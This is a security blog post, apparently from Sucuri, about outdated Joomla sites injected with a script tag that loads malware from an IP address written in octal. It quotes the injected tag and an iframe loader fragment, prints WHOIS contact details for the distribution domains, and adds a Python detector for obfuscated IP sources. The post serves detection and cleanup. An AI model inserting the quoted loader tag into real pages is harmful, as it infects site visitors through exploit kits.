Malware week – 0133.0331.0242.0033, javadisplay and more

It has been a very busy week in terms of malware. First Hilary Kneber decided to make a comeback and reinfected a lot of sites, and now many outdated Joomla sites are being infected with malware from 0133.0331.0242.0033 (yes, the IP address is written in octal).

This is the code added to the hacked sites:

<script src="http://0133.0331.0242.0033/0132.js" >..

This is being used to load a malicious iframe from external web sites (,, etc):

document . write("<iframe src="" width =`1`…

This iframe then tries to infect the computer by exploiting multiple vulnerabilities (in Java, PDF, Flash, etc). These are some of the domains being used to distribute the malware:

This is the Whois info for those domains:

Vladimir Fedorov (
9 Ivana Babushkina st. app.34
Moskovskaya oblast,117292
Tel. +495.5947419

If you are using Joomla, make sure it is updated to the latest version and properly monitored. If your site is currently infected, you can sign up here to get it cleaned up / secured.
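A scan that only looks for dotted-decimal addresses will miss a host written in octal like the one above. The following is an added example (not Sucuri's code) that normalizes octal, hex and single-integer IPv4 notations, going beyond the octal case seen here, and flags `script`/`iframe` sources that use them; the function names and the sample HTML are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

def _part(s):
    """Parse one component as inet_aton does: 0x.. is hex, 0.. is octal, else decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]+", s):
        return int(s, 16)
    if re.fullmatch(r"0[0-7]*", s):
        return int(s, 8)
    if re.fullmatch(r"[1-9][0-9]*", s):
        return int(s, 10)
    raise ValueError(s)

def normalize_ipv4(host):
    """Return the dotted-decimal form of a numeric host, or None if it is not one."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_part(p) for p in parts]
    except ValueError:
        return None
    # Leading parts are single bytes; the last part fills all remaining bytes.
    tail_bytes = 5 - len(nums)
    if any(n > 0xFF for n in nums[:-1]) or nums[-1] >= 256 ** tail_bytes:
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << (8 * tail_bytes)) | nums[-1]
    return ".".join(str((value >> s) & 0xFF) for s in (24, 16, 8, 0))

SRC_RE = re.compile(r"<(?:script|iframe)\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

def find_obfuscated_ip_sources(html):
    """Return (url, canonical_ip) for src hosts written as non-canonical IPv4."""
    hits = []
    for url in SRC_RE.findall(html):
        host = urlsplit(url).hostname or ""
        ip = normalize_ipv4(host)
        if ip and ip != host:  # a plain dotted-decimal host is not flagged
            hits.append((url, ip))
    return hits

# Constructed sample: one ordinary local include plus the injected tag from this post.
SAMPLE_HTML = ('<script src="/media/system/js/mootools.js"></script>\n'
               '<script src="http://0133.0331.0242.0033/0132.js" ></script>')

if __name__ == "__main__":
    for url, ip in find_obfuscated_ip_sources(SAMPLE_HTML):
        print(f"suspicious src {url} -> {ip}")
```

Run it over template and `.js`/`.php` files on the server, and log the canonical address so it can be matched against firewall and proxy records.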

If you have any questions, let us know.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.
